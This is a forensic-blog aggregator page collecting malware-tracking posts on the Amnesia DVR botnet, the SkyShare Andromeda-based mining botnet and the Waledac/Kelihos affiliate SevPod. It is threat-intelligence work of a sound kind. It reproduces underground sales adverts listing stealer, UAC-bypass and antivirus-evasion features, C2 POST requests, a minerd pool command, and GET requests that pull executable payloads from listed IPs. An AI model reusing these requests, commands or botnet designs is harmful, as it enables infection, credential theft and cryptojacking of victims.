Forensic Blogs

An aggregator for digital forensics blogs

by

Amnesia / Radiation Linux botnet targeting Remote Code Execution in CCTV DVR samples

Reference
Amnesia / Radiation botnet samples targeting Remote Code Execution in CCTV DVR 
2017-04-06 Palo Alto Unit 42. New IoT/Linux Malware Targets DVRs, Forms Botnet2016-08-11 CyberX Radiation IoT Cybersecurity campaign





Download
             Other malware

Download. Email me if you need the password (see in my profile)




Hashes

MD5SHA256SHA174bf554c4bc30d172cf1d73ac553d76606d30ba7c96dcaa87ac584c59748708205e813a4dffa7568c1befa52ae5f03743c40221177383da576b11a0b3f6b35d68a9cde745dd9056e5ab6a92e61822b6c04afd34610aa7b3863f34d340f960b89e64319186b6ffb5d2f86bf0da3f05e7dbc5d9653c865dd67853a24fd86ef74b05140827c1d5fd0bd2b486466f4d3e30f7b22d0bc76cb68f9175fe89bbc8e44d45f4d86e0d96288e1e868524efa260ff07cb63194d04ea575ed62f6d1588bea33c20ababb42c02662d93d60153411bb2965f4c3d52c650aff04f48e521d8bc81acbba0fc56605f60f5a47743491d48dab43b97a40d4a7f6c21caca12a1e0281178b4a9d8dec74f50a7850867c8783743534f915ac414e9aad2859217169f9a3aa2f9cd1d07c535aae41d5eed1f8851855b95b5b38fb6fe139b5f1ce43ed22df22d66f1e47c983a8d30ad7fd30cd08db8cd29a92b059e08f2ce1c3e55e2493baf36c1ad3c6327f24121d25ca818cf8414c1cc704c3004ae63a65a9128e283d64be03cdd42e90d45b81e9a97ddcc9911122f4e8fd439ccc8fa9f4bc173bf80d922da4e755896af0db6137b2b33a8e344efcaca0abe56c6163ae64026ccef65278b232a9170ada1972affab32f8c3ce3a837e80a1d98ada41a5bf39b01e7a253273e922ce93e2746a9791798e3fe3a595e7cc8e32071781e36bbbb680d8578ea307404ec07e3a78a030574da8f9699cfdec405f6a9f43d58b1856fce7ca3445395d3335e322c56278e258e4d7b5e17ad98e64313af898c5e15a68616f8c40e8c7408f39e0996a9e4cc3e22e27e7aeb2f8d54504022707609a0fec9cbb21005cb0875be2a472693522e5f361a051f568bd1d74d901d3046ea20e3cf34d1d4cdfd797632c47396d9bdc568a75d550d208b91caa7d43a9be7fc96b2a92888572de2539f227c9a6625449f83c86af536d87c1e5745e7d8c9f44fd25d4b0feb1dd459ade96297b361c69690ff69e97ca6ee5710c3dc6a030261ba69e06ef69a683913ae650634aedc40af8d595c45cb4f90c7c5e257c95047dbf52bbfbe011fd64db9924decd3e578a6b7ed7476e499f8ed792202499b360204d6f5b807f881b81c3a9be6ae9300aaad00fb87d5407ed6e84ec80b7c0528e54b086e5455ef92218ea23d035e6896b39c57d9609dc1285929b746b06e070886809692a4ac37f9e1b53b250c868abc912ff2fdcd733ff1da87e48e7d4c288a736405b42d2c7e42244ac73695bb7bfe6b64f03fff3ed6206337332a05ab9a84282f85a105432a3792e20711b920124707173aca65181c8da84e062c803a43a404ad49302d6441157813de77d9849da5db9987d0bb6b2885a4f8c9d84e5dc49830abf7b1edbf1b458d8b9d2bafb680370106f93bc392dff9bdb31d3b9480d9e5f72a307715859dd094614ea66b907314398cc14b3d2fdebe796b29b65c3886b6734df788cfc6628fbee4ce8921e3c0e8fc017e4dea2da0fd0bc7e71c42d391f9c69375505dbf3767ba967f910300fe3120a666a85b84500ded1af8fb61885dce73237c4d7b4d481460baffbd5694ab671197e8c285d53b551f893d6c09342ed67e08d16ab982a4012fcecdca060a5da46b5477de039f7838dea20d3be1ae249fcb886136558ec806da5e70369ee22631bfb7fa06c27d16c987b6f6680423bc84b05b19202b45e5a58cadec8c2efa40fd924b64177d91bf10249c5d98ea6ae11f17b6ef09708f57ec9dfba8cf181a723a6ac2f5a7f50b4550dd33a34637cf0f302c43fd0243682dab9ec3ff0b629cce4e16c9c74171dd2551d4fb0a7e12d2861e8512a38a6cdef3ddf09351ee0364bdbb5b2ff7825699e1b1ee319b600ea0726fd9bb56d0bd6c6670cbc077c490bb22df9886475dc5bedfc6c0320610249b7f5a1228fa66cbd35e75fb774fdc8e9c7a5239601a361b67b1aa3f19b462fd894402846f635550a1d63bee75eab0a2ae89bc6c5cc1818b3136a40961462327c3dececc5b97d54dc5001eb7cf238292405070a6a010bf82e2c32cba896e04ec8dbff58e32eee9391f6986ab22c612165dad36a096d2194f5f3927de75605f6ca6110fe683383a01642f523bb46c2e901416047dca1c5d4ead65c9937a376d9a53168e197d142eb27f04409432c387920c2ecfd7a0b941c8bbf667213a446bc9bc4a5a2e54e7391752e3a9b8c617655312c573ecb01d292b320fff2eaeb480cf01696b7563580b77605558f9474c34d323b05e5e47bf43ff16b67d6ade102a6f35e08f18aa0c58358f5b22871eb0a45fc8835a3d385162ae02bd4cb6c5ebac87b113ec41cc2fd9be9ac712410b9fd3854d7d5ad2dcaac33af2701102382d5815831eb9cf0dcd57a879c04830e54a3b85fe5d62291497740fa8920e4af6aa981a5b405937b13014435108b34bb7cbcef75c4ef00429b440a2adf22976c31a1645af5312528d6b90f0b88b1ad5dcc87d377e6a82dc6ac642115e925e315ff7a69c2f2cf1556423d5afb3d0d0e2144bd1ddd27843ef65a2fce382f6d590a8fee286fda49f807471154564fe900b3a2b030c28211404afa45703c6869dea951ec487fb3fece58234677d7fe3e4dcbdefa773e3f09cdc409f03a09a3982f917a0cc656b306f0ece3dd1a2564a87720b03d9471522590530dd90ad30b2d235ec98b5783e84998197fc25cbac57870e3cdeb2dec03b403d5de9778a2ec5949d869281f13976c2fc5b071e0f5f54277680c809020b9eb6d931dc6b226a913e89bb422f58228de0d0c3a73d24df62057e299b6af183889e6bcb2382b818993ef6b8c738618cc74a39ecab243302e13fdddb02943d5ba794836a683ef6f7653e5ee64969cbbbe4403601ae9dedd428f50a0f8cd57b0d8fe818ace6af20ce61dcfc3419ddef25e61b6d30da643a1213aa725d579221f7c2edef40ca2db39bd832256b94e43546dfb77532f6d70fcd1ce874e1d6d4564b35bb19d2b85ca620d7b8f2d0bda184dfa31018fe999dfd9e1f99ca0ef502296c2cccf454dde30e5d3a9df9c1af00d3263893b5d23dbf38015fe3c6a92cefafe9502ae7b0048b9ea25dd7537818904ce7d6b3e1fba8cdf2f490031e8eb24cd515a30808cdd4aa15c2a41aa0016f80820e080ac0130ab3f7265df01b8397e4abd13c38cb8eb34e1fb7dd9d9f0e1fef2803812759eb54dc959b3cc03fbd285cef9300c3cd2b7fe86b4adeb5ca7b098f90abb55b8a5310a99f0f8c92bfa2f8da87e60c645f2cae305aca0fc25ce066498031dc4ca3f72de4b8f23fecbb7386a2aa096819d857a48b853095a86c011d454da1fb8e862f2b45837f4d97eea294fc567b058b09cc915be56c2a80e15a2fcfff8d6aab9a0abe9ca97f6093edf6af2fa4f987df773d37d9bb44841a720817ce3817dbf1e983650b5af9295a16f4ddf49fbf23edb23f50be62637a4a688e352057ed98e8fa385b39ca274e0de17b1007e6f7a737cb73802d54f7758afe4f9d0a7d2ea7fda4240904c0a79abae732605729a69d4c2b88bfe3a06245f8fbfb8abe5e9a894cec320db5f1230fcfe0672c8515eb9ddcfcf7cf1e0d7756d1874630d0d697c3b0f3df0632500cff1845b6308b11059deb078d40dbf34a02dd43a81e5cdc58a0b11bfa9f566318d6af9211d0477f9251cf9524f898f3f97848514b63e9d655a5d554e62f9e102eb477c5767638eeec9efd5c6ad443d8b0e76be186fd609d5a8a33d59d16ffa3bdab1573

by

SkyShare : Evolution Mining Botnet System

SkyShare : Evolution Mining Botnet System

At begining of the year, an advert for a  mining botnet appeared on underground :

Piece of the Advert on the Underground
Original text of the Advert :
------------------------------------------
Предлагаю стабильную автоматическую систему по майнингу на ботах.
Краткое описание - это полноценная система «под ключ» для долгосрочного и стабильного майнинга. 
Поддерживаемые валюты: quark ( рекомендовано ) / scrypt.

Основной функционал:

Drop-system - майнер автоматически устанавливается на зараженную машину сразу после прогруза лоадера (размер - всего 13кб)

Panel - удобная панель по контролю за ботами, вы можете смотреть статистики, курсы валют коинов, прогружать на боты сторонний софт и многое другое. Помимо базовых функций в панель включен стиллер и формграббер, для получения максимального дохода с ботов.

AutoPool - каждому клиенту мы предоставляем удобную панель для майнинга валют на наших пуллах,с возможностью переключения мощностей на самую выгодную в любой момент! Только для кварковых валют: qrk,src,frq,fz,c-note,wiki ( список будет дополнятся, в зависимости появления новых валют на биржах)

Данное обновление решает следующие проблемы:
1) потерю дохода из-за падения курса / увеличения сложностей
2) бан панели управления ботами (лоадером), когда теряется возможность контроля ботов
3) недоступность пулла / бан на пуллах

CPUMaxProfit - вырабатываем quark! Теперь вы получаете максимальный профит с каждого бота, не теряя стабильности заработка! Наш софт поддерживает все доступные виды quark валют, торгующихся на рынке : qrk, src, frq, fz, c-note и wikicoin!

Поддерживаются все версии windows - если раньше quark невозможно было выработать на версиях windows, ниже Windows 7, то теперь это возможно! Работа гарантированна на любой разрядности, будь то 32 или 64бит, а так же на любой конфигурации компьютера! При том, если раньше существенно снижался доход с 32битных машинок, то теперь эта разница минимальна!

Anti-av system - в майнере имеется функция автовосстановления в системе после удаления, в 7 из 10 случаев удаления майнера антивирусником / руками после перезагрузки он будет восстановлен в системе и продолжит свою работу! 

Так же при выдаче билд майнера палится минимальным количеством антивирусов, большинство из которых непопулярны. Над усовершенствование фуд’а ведется активная работа. Майнер легко криптуется, при надобности дадим контакты криптосервисов,где вы можете получить скидку при крипте нашего продукта ( работают практически 24/7 )
Включен обход UAC!

Mining Community - для владельцев нашего майнера предоставляем доступ к сообществу, где обсуждаются все последние новости по софту, а так же имеется возможность предложить свою идею по развитию проекта.

Стабильность - за последние 3 месяца работы мы потеряли не более 10% скорости от общего числа производимых коинов и могу смело сказать, что майнеры живут месяцами (а может и годамиsmile.gif

Абузоустойчивость - каждая система располагается на мощнейшем серверном оборудовании, способном выдержать сотни тысяч ботов. К прокси / лоадеру привязаны абузоустойчивые домены, а сверху на систему наложено проксирование посредством технологии FastFlux, благодаря ей вы можете не боятся за свою безопасность во время работы с системой!

Поддерживаемые коины - наш бот поддерживает любые коины на алгоритмах quark / scrypt ( litecoin, dogecoin, securecoin и другие ). В данный момент система направлена на выработку именно quark коинов. Почему именно их? Читаем ниже в faq. Но если вы хотите майнить скриптовые коины - не проблема, все отличие только в том, что автопулл под них пока что не разрабатываем и вам надо будет выбрать пулл , куда будете майнить (Или саппорт подскажет актуальный пулл под вашу валюту).

Ценовая политика:
Только абонементная работа ( ввиду сложности системы ):

750$ первый месяц работы, 400$ последующие. 

В цену включено: 2 панели (лоадера и майнера), exe дроппера, а так же exe майнеров и постоянные обновления. 

Частые акции и скидки от нас и наших партнеров!

Оплата любым удобным вам видом валюты - от W1, Yandex Money, WM, Perfect, QIWI и до любого актуального криптокоина!

Популярные вопросы и ответы на них:

- А через гаранта работает?
- Работаем.

- Почему в аренду?
- Потому что система требует тонкой настройки и наш сервер тончайшим образом настроен под данную связку, так же мы не одобряем сливы в паблик.

- Криптовать надо постоянно?
- Лоадер - если хотите что бы боты провисели дольше, то да, следует регулярно обновлять крипт на ботах (таск update по текущим ботам), майнеры криптовать только перед прогрузом, далее они работают независимо от дроппера.

- Сколько живут майнеры в системах?
- Месяцами.

- Вы грузите?
- Сейчас - нет, как начнем - объявим обязательно. Для майнинга подойдет любой микс, будь то снг, азия, европа или сша.

- А почему кварк? Алгоритм малопопулярен и курсы низкие!
- Этому выбору есть несколько причин:
1) Сложность практически не изменяется, таким образом вы будете получать столько же коинов,сколько и получали во все время работы.
2) Алгоритм оптимизирован на работу цпу, таким образом асики не выйдут и курсы/ сложности не обвалятся, как это в данный момент происходит со скриптовыми валютами
3) Майнинг возможен на абсолютно любой конфигурации машины.
4) Произведена глубокая оптимизация, и сейчас сервера с пуллами выдерживают огромные скорости со стороны ботнетов, а так же возможно быстрое расширение парка, для поглощения максимальной доли вырабатываемых коинов из общей сети.
5) Касательно курсов обмена - над этим ведется работа, в течении месяца представим вам кое-что крутое wink.gif

- А сколько выдержат ваши пуллы? У меня парк из 100к ботов!
- И 100к выдержат,и в разы больше. Предоставляем несколько потоков для удобного менеджмента ваших скоростей.

- А я не хочу майнить кварк, хочу майнить дог или лайт или любой другой скриптовый коин!
- Без проблем, как делали, так и будем поддерживать скриптовую версию майнера, но автопулл под него делать не планируем и пуллы поднимать так же.


По всем вопросам писать в наш саппорт:
jid: ph0enix@armada.im
icq: 498758324

По вопросам технического характера, для владельцев майнера , писать на jid: xiii@armada.im
------------------------------------------
Google Translated as :
------------------------------------------
Suggest a stable automatic system for Mining on boats. 
Short description - a complete system of "turnkey" for long-term and stable Mining. 
Supported currencies: quark (recommended) / scrypt. 

The main features: 

Drop-system - a miner is automatically installed on the victim machine immediately after progruz loader (size - only 13KB) 

Panel - convenient control panel to control the bot, you can watch statistics, exchange rates Coin, progruzhat bots on the third party software and more. Besides the basic functions in the panel included Stiller and formgrabber, maximizing proceeds with bots.

AutoPool - every client we provide convenient panel for mining rates on our pool products with the possibility of switching capacity on the best at any moment! Only for the quark exchange: qrk, src, frq, fz, c-note, wiki (a list will be supplemented, depending on the appearance of new currency exchanges) 

This update addresses the following issues: 
1) loss of income due to depreciation / increasing complexities 
2) ban bots control panel (the loader), when lost the ability to control bots 
3) the unavailability of the pull / ban for Pullach 

CPUMaxProfit - are working out quark! Now you get the maximum profit from each bot without losing the stability of earnings! Our software supports all available types of quark currencies traded in the market: qrk, src, frq, fz, c-note and wikicoin! 

It supports all versions of windows - if earlier it was impossible to develop a quark versions on windows, under Windows 7, it is now possible! Work is guaranteed to any digit, whether 32 or 64bit, as well as on any computer configuration! Though, if earlier significantly decreased income from 32 bit machines, but now the difference is minimal!

Anti-av system - a miner has AutoRecover in the system after the removal, in 7 of 10 cases of removal miner antivirusnikah / hands after reboot it will be restored in the system and will continue to work! 

Just when issuing build miner palitsya minimum amount of antivirus, most of which are unpopular. Improvement over fud'a active work. Miner easily crypto, if necessary, give kriptoservisov contacts where you can get a discount at the crypt of our product (work almost 24/7) 
Included bypass UAC! 

Mining Community - for the owners of our miner provide access to the community, where we discuss all the latest news on a software as well as the possibility to propose his idea for the development project. 

Stability - the last 3 months of work we have lost more than 10% of total rate produced a coin and I can safely say that the miners live for months (and maybe godamismile.gif 

Bulletproof - each system is located on a powerful server hardware that can support hundreds of thousands of bots. By proxy / loader attached bulletproof domains, and on top of the system imposed by proxy technology FastFlux, thanks to her, you can not fear for their safety during the operation of the system! 

Supported Coin - our bot supports any Coin on algorithms quark / scrypt (litecoin, dogecoin, securecoin and others). Currently the system is aimed at developing a quark Coin. Why them? Read below in the faq. But if you want to script Mein Coin - no problem, all the only difference is that under avtopull them yet do not develop and you will have to select a pull, which will Maini (Or tell a support under the actual pull your currency). 

Pricing policy: 
The subscription only work (due to the complexity of the system): 

$ 750 first month, $ 400 the next. 

Price includes: 2 panels (loader and miner), exe dropper, as well as exe miners and constant updates. 

Frequent promotions and discounts from us and our partners! 

Pay any way you view currency - from W1, Yandex Money, WM, Perfect, QIWI prior to any actual kriptokoina! 

Popular questions and answers: 

- A guarantor through work? 
- Working. 

- Why rent? 
- Because the system requires fine-tuning and our server is configured under the subtlest way this bunch, because we do not approve of public plums. 

- Kriptovat must constantly? 
- Loader - if you want that bots hung longer, then yes, you should regularly update the crypt on boats (TASK update on current bots), just before the miners kriptovat progruz, then they work regardless of dropper. 

- How many miners live in the systems? 
- A month. 

- Do you ship? 
- Now - no, we start - declare mandatory. Suitable for mining any mix, whether CIS, Asia, Europe or the United States. 

- And why the quark? Malopopulyaren algorithm and low rates! 
- This choice has several reasons: 
1) Complexity is practically unchanged, so you'll get the same Coin how to obtain all the work. 
2) The algorithm is optimized to work cpu so Asik will not leave and courses / complexity not cave in, as is currently happening with scripted currencies 
3) Mining is possible on any machine configuration. 
4) Produced deep optimization, and now server Pulliam kept tremendous speeds by botnets, as well as possible the rapid expansion of the park, to absorb the maximum share of the total produced Coin network. 
5) Regarding the exchange rates - on this work is being done within a month will introduce you to something cool wink.gif 

- And how many will survive your Pulliam? I have a fleet of 100k bots! 
- And 100k survive, and many times more. Provide multiple threads for easy management of your speed. 

- I do not want Mein quark want Mein dog or light or any other scripting a coin! 
- No problem, as we did, and we will support scripting version miner, but avtopull under it and do not plan to raise Pulliam as well. 


On all questions write to our support: 
jid: ph0enix@armada.im 
icq: 498758324 

For questions of a technical nature, for owners miner writing on jid: xiii@armada.im
------------------------------------------


Thanks again  to an Independant researcher from Russia who shared some referer driving to what looks like a TDS I face a new for me infection chain.


3 tds call then Nuclear Pack pushing 2 samples
The .ok call was triggered on mouse move :
killbot function in the redirector
Not sure how much bot would be stopped by this...Two Payloads :
a40db0fb9bfaf25dfddcd1aaf068d133 (Tofsee) and 9d82ce5c093390003a0f8b976610e479 ( an Andromeda)
Here are some request from that Andromeda :
http://yaybit.net/0x0x/image.phpPOST /0x0x/image.php HTTP/1.1
Host: yaybit.net
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Connection: closeAnd the ET open rules fired in Suricata :
06/24/2014-01:45:07.423116 [**] [1:2404163:3496] ET CNC Zeus Tracker Reported CnC Server group 14 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:8006/24/2014-01:45:07.877385 [**] [1:2003492:16] ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:8006/24/2014-01:45:08.566311 [**] [1:2016223:8] ET TROJAN Andromeda Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80A look at the C&C:
Binary don't lie :) We have an andromeda 2.06 Forked Panel
surely based on the leaked version.
2014-06-24 - 57k bots

Meaningfull Background :)
Sky Share version (bottom right of the Panel)The botnet was growing really fast. 57k in one week. Then 1 week of rest and a jump in 1 day to 72k total (including dead one) bots.

2014-07-01 - 72k bots

Geo repartition :
That Sky Share geo repartition - 2014-06-24
Tasks List (the miner)8d07b2d0062bfc7e4c7b8052e0a17646 (32) and cc560f5a630ee48365517125c173a94d (64)

minerd.exe -a scrypt -o stratum+tcp://zerofloor.net:16166 -u 16166 -p x


In the stats it's just the current values of main crypto currencies
The stealer part was not operationnal on that one but here is how it looks.



The andromeda form grabber :

RU/UA focused RegExp

Someone was selling this kind of setup on underground :

------------------------------------------
Лодер на базе андромеды прогружает ехе майнера.
В наличии ботнет 27к ботов (боты за ближайшие сутки 24часа).

Отдам всё что давали с лицензией: некриптованый файл лодера, два ехе майнеров(для 32 и 64 битных ос), стиллер-граббер пассов из браузера+грабер кошелей биткоин, доступ на лодер+стата активных майнеров (лодер хотится на FastFlex овнерами майнера - не надо парится за абузы и хостинг) .
Лицензия+не_хилый_парк_ботов= 2300$.

СРОЧНО, пишите в ПМ контакт кому надо.

Причина продажи: срочно нужны деньги.
------------------------------------------
Loder based Andromeda progruzhat exe miner. 
Available 27k botnet bots (bots for the next day 24hours). 

I will give all that gave license: nekriptovany file Loder, two miners exe (for 32 and 64 bit OS), Stiller grabber passes from browser + Graber Koshelev Bitcoin, access to Loder + become active miners (Loder hotitsya on FastFlex ovnerami miner - not need for steamed abuzy and hosting). 
License + ne_hilyy_park_botov = $ 2300. 

URGENT, write to the PM who should be contacted. 

Reason for sale: need money urgently. 
------------------------------------------

Author did not reply to questions about the incomes...but we can guess those were not that huge.

So. Bummer. Andromeda and a stratum coin miner. I like that post as less as i liked the "Silence Exploit Kit" one.

Fiddler : NuclearPack_Andro_Tofsee_2014-06-24

by

SevPod : The Waledac (Spambot.Kelihos) Affiliate by Severa

SevPod : The Waledac (Spambot.Kelihos) Affiliate by Severa
Severa's Avatar
Waledac (aka spambot.kelihos) is the Kelihos bot Loader (mod2/[whatever].exe) and is also loading Simda (right now : Simda.AT (MS)  - mod1/[whatever].exe).

As all affiliate stuff you'll see it in many infection paths

Here in Magnitude (Top-Exp) :
Waledac pushed in Magnitude 2013-10-10
bed3362bd67c4383deba769b81006a67bed3362bd67c4383deba769b81006a67 Tried :
GET /b0ber03.exe HTTP/1.0
Host: 78.154.13.143
This is the old pattern for 2nd stage call.
After middle of december :

Kelihos - Some new pattern in payload distribution : /(mod1|mod2)/(satpro1|kecik01).exe
— kafeine (@kafeine) December 14, 2013 Here in Neutrino Thread 6426346 :

Waledac pushed in Neutrino
2014-01-02
(after *.hopto.me/appSound.swf redirector on 198.50.171.61 and 36)
18a63f41598243ea591cf4a9837c907018a63f41598243ea591cf4a9837c9070 tried :
GET /mod2/safpro1.exe HTTP/1.0
Host: 62.182.87.57GET /mod1/safpro1.exe HTTP/1.0
Host: 46.49.31.165
Here in Styx :
In Styx on 2014-03-05
93c0bd582157e28422f2da7a3cae92c093c0bd582157e28422f2da7a3cae92c0 tried :
GET /mod2/5minut1.exe HTTP/1.0
Host: 92.114.193.170
GET /mod1/5minut1.exe HTTP/1.0
Host: 178.150.244.54


Here in Sweet Orange
In Sweet Orange on 2014-03-09 (after Keitaro)
6397feb9b6b79799c32e271d88b7a688
(Can't get the call for this one )

And I made a pass just now on a fake Flash Player (Soc Eng) :

Waledac pushed as a Fake Flash Player on fake porn websites
Soc eng 2014-05-10
479209d2e582511657662862e2944a10This 479209d2e582511657662862e2944a10 tried :
GET /mod1/hafl825.exe HTTP/1.0
Host: 178.150.244.54GET /mod2/hafl825.exe HTTP/1.0
Host: 176.8.154.15Note: Was SkyTraf till recently.

So here is the affiliate behind this :

Advert on UndergroundOriginal Text from the Advert :
------------------------------------------
С гордостью хочу представить Вам свой новый проект - приватную партнерку по подмене выдачи SevPod.com. Мне удалось сделать действительно долгоживущую подмену, и Ваши загрузки будут приносить Вам доход многие месяцы даже после того, как Вы перестанете грузить. В отличие от других подмен, у меня есть биды фактически для всех стран. Конечно, чудес не бывает, и максимальный доход Вы получите с Сша, Канады, Австралии, Великобритании, Западной Европы, но и страны третьего мира будут длительное время приносить Вам стабильный доход! 95% от денег, которые я получаю за клики от фид провайдеров, я выплачиваю своим адвертам.

Регистрируйтесь на сайте SevPod.com, и стучите мне в жабу jabber@honese.com для апрува Вашего аккаунта.

Всем удачных загрузок. 


--------------------

Jabber(XMPP): jabber@honese.com
ICQ: 104967
------------------------------------------
Translated by google as :
------------------------------------------
Proudly want to introduce you to your new project - a private affiliate for substitution issue SevPod.com. I managed to make a really long-lived substitute , and your download will bring you income for many months , even after you stop shipping. Unlike other substitutions , I have bids for virtually all countries. Of course, miracles do not happen , and you will get the maximum revenue from the U.S., Canada , Australia, UK, Western Europe, but also the third world countries will be a long time to bring you a steady income ! 95% of the money that I get for clicks from feed providers , I'm paying your adverts .

Register online SevPod.com, and knock me into a toad for jabber@honese.com apruva your account.

All successful downloads .


--------------------

Jabber (XMPP): jabber@honese.com
ICQ: 104967
------------------------------------------

Note : The portal domain has changed . Severa wrote he had to do that cause of Competitors

Sevpod : Login pageSevpod - NewsNews :
------------------------------------------
May 5, 2014
Новости от 5 мая
Всем выплатил по 25 апреля включительно, сорри за небольшую задержку на этой неделе.

Хочу заметить, что подмена выдачи + кликер это долгоживущая тема, и если сравнивать несколько партнерок, одна, например, дает 1000 долларов в первый месяц, вторая 800 долларов, а третья - 500 долларов. Кажется, что первая партнерка гораздо лучше всех, а на самом деле может получиться так, что первая партнерка приносит деньги только 1 месяц с момента отгрузки, а вторая - 2-3 месяца, а третья - вообще полгода. И за длительный период, третья, изначально не самая выгодная партнерка приносит втрое больше конкурентов.

Также хочу заметить, что необходимо доверять людям, стоящим за той или иной партнеркой, что в один прекрасный день они просто не пропадут, оставив Вас без выплат.

Удачного Вам дня!

April 20, 2014
Список конвертящихся стран
Я вынужден ограничить список принимаемых моей партнеркой стран следующими странами:

Австралия
Великобритания
Германия
Индия
Индонезия
Испания
Италия
Канада
Нидерланды
Польша
Румыния
Сирия
США
Таиланд
Франция
Швеция
ЮАР
Япония

Лить на меня страны НЕ из этого списка более нет смысла, загрузка даже не отстучит в стату. Благодарю за внимание.

April 16, 2014
Смена домена
Внимание, из-за абуз конкурентов мне пришлось сменить домен с sevpod.com на [redacted]. Данная смена никак не скажется на заработке моих адвертов, но не забудьте обновить у себя линк для скачивания моего exe файла. Тем же, кто пишет абузы, посоветую от души не раскачивать лодку, сами же в ней сидите. Не можете платить адвертам столько, сколько плачу я - оптимизируйте свой бизнес, а не пишите абузы на мой. Всем удачи!

March 11, 2014
Улучшили отстук!
Исправили отстук, стало получше, кто пробовал ранее и кого не устраивал отстук - попробуйте еще, думаю, будете приятно удивлены. Конвертим любые загрузки!


March 1, 2014
Выплаты
Всем выплатил по 21 февраля включительно, кто не получил - пишите тикет, скорее всего у вас не заполнены платежные данные. Теперь выплаты будут регулярно, раз в неделю, по субботам.

February 12, 2014
Можно грузить!
Все проблемы полностью решены, можно грузить, в любом объеме!

January 22, 2014
Пауза
Прошу временно преостановить загрузки, идет переезд в новый ДЦ и большое обновление софта, возможны потери части загрузок. Пауза несколько дней, как можно будет грузить - я сообщу. Благодарю за внимание.

January 15, 2014
Автоматические выплаты, от 1 цента!
Все аккаунты от 100 долларов баланса уже получали все в срок, аккаунты меньше 100 долларов - были задержки с выплатами. Сейчас автоматизировал все, теперь будет уходить автоматически, раз в неделю, суммы от 1 цента! Минималки фактически теперь нет вообще.

December 31, 2013
С Новым Годом!
Пришло время раздать наши новогодние подарки. Больше всего загрузок сделал адверт с ID 11325, и он же заработал больше всего денег за эту новогоднюю неделю, и хотя еще 6 часов до окончация срока акции, уже врядли что-то поменяется. 2000 вмз выплачены законному победителю! Также пользуясь случаем поздравляю всех своих партнеров, клиентов, да и просто всех-всех-всех с Наступающим 2014 Годом. Удачи, всех благ, успехов в новом году.

December 24, 2013
Новогодние подарки от SevPod.com
Поздравляю всех с Наступающим 2014 Годом, и желаю всем здоровья, успехов в бизнесе и удачи во всех начинаниях. Всем известно, что дедушка Мороз живет на севере, и, конечно, у него есть два подарка для двух наших лучших адвертов, к Новому 2014 Году.

+1000$ тому, кто получит наибольший профит за неделю с 25 по 31 декабря*
+1000$ тому, кто сделает больше всего загрузок за неделю с 25 по 31 декабря**

Номера ID аккаунтов победителей будут объявлены в 00.00 1 января 2014 года по мск, в новостях партнерки и в этом топике, и им незамедлительно от партнерской программы SevPod.com на их WMZ аккаунт будет выплачен их новогодний подарок!

* USD, в сумме за все дни акции, по статистике партнерки SevPod.com
** загрузок, в сумме за все дни акции, по статистике партнерки SevPod.com

О партнерской программе SevPod.com

SevPod.com это новейшая революционная партнерская программа по подмене поисковой выдачи. Мы получаем максимальные биды от наших фид провайдеров, 95% от полученных нами средств мы отдаем нашим адвертам. Конвертируем клики почти всех стран мира, кроме этого активно используем более современные методы монетизации траффика, такие как оплата за действия пользователя на сайте, оплата за просмотр и взаимодействие с различным контентом. В отличие от кликботового траффика, у нас живой траффик, такой траффик стоит значительно дороже, и будет приносить вам доход длительное время с момента загрузки.

Регистрируйтесь на сайте SevPod.com, и стучите мне в жабу за апрувом Вашего аккаунта: jabber@honese.com
Всех еще раз с Наступающим Новым 2014 Годом!
С Уважением, Пётр Севера

December 19, 2013
Проблема с отстуком решена!
Проблема с отстуком решена полностью, можно грузить без ограничений, обязательно обновите ехе файл.

December 12, 2013
Низкий отстук
Наблюдается низкий уровень отстука, я работаю над этим, в ближайшие два дня будет релиз, в котором проблема будет решена. Приношу всем свои извинения за доставленные неудобства.

December 9, 2013
Поехали!
С гордостью хочу представить Вам свой новый проект - приватную партнерку по подмене выдачи SevPod.com. Мне удалось сделать действительно долгоживущую подмену, и Ваши загрузки будут приносить Вам доход многие месяцы даже после того, как Вы перестанете грузить. В отличие от других подмен, у меня есть биды фактически для всех стран. Конечно, чудес не бывает, и максимальный доход Вы получите с Сша, Канады, Австралии, Великобритании, Западной Европы, но и страны третьего мира будут длительное время приносить Вам стабильный доход! 95% от денег, которые я получаю за клики от фид провайдеров, я выплачиваю своим адвертам. Если у Вас есть вопросы, Вы можете задать их мне в тикетах.

Всем удачных загрузок!

------------------------------------------
Translated by Google As:
------------------------------------------
May 5 , 2014
News from May 5
All paid through April 25 , inclusive , sorry for the delay this week.

I note that the issue of substitution + clicker is a long-lived topic , and if you compare a few companions , one , for example, gives $ 1,000 in the first month , the second $ 800 , and the third - $ 500. It seems that the first affiliate program is much better than anyone, and in fact it may happen that the first affiliate makes money only 1 month from date of shipment , and the second - 2-3 months , and the third - generally six months. And over a long period , and the third , originally not the most profitable affiliate program brings three times more competitors.

I also want to note that you must trust the people standing in one way or another affiliate , that one day they just do not disappear , leaving you without payment .

Have a nice day !

April 20 , 2014
List of countries konvertyaschihsya
I had to limit my list of accepted affiliate of the following countries:

Australia
United Kingdom
Germany
India
Indonesia
Spain
Italy
Canada
Netherlands
Poland
Romania
Syria
USA
Thailand
France
Sweden
South Africa
Japan

Pour me out of this country is NOT a list makes no sense, not even loading otstuchit in the article. Thank you for your attention .

April 16 , 2014
Changing domain
Attention because of abuse competitors I had to change domain sevpod.com on [redacted]. This change will not affect the earnings of my adverts , but do not forget to update at the link to download my exe file. Those who wrote abuzy , heartily advise not to rock the boat , they themselves sit in it . Adverts can not pay as much as I cry - optimize your business , and do not write in my abuzy . Good luck to everyone !

March 11 , 2014
Improved otstuk !
Otstuk corrected , it became better , who tried earlier and who are not satisfied otstuk - try , I think will be pleasantly surprised . Converteam any download !


March 1 , 2014
payments
All paid through February 21, inclusive, who have not got - write a ticket , you probably have not completed the payment details . Payments will now regularly , once a week , on Saturdays.

February 12 , 2014
Can be shipped !
All problems are fully addressed , can be shipped in any volume !

January 22 , 2014
pause
Ask temporarily preostanovit boot is moving into a new DC and a lot of updating software, possible loss of the downloads . Pause for several days, it will be possible to ship - I 'll let you know . Thank you for your attention .

January 15 , 2014
Automatic payments from 1 cent !
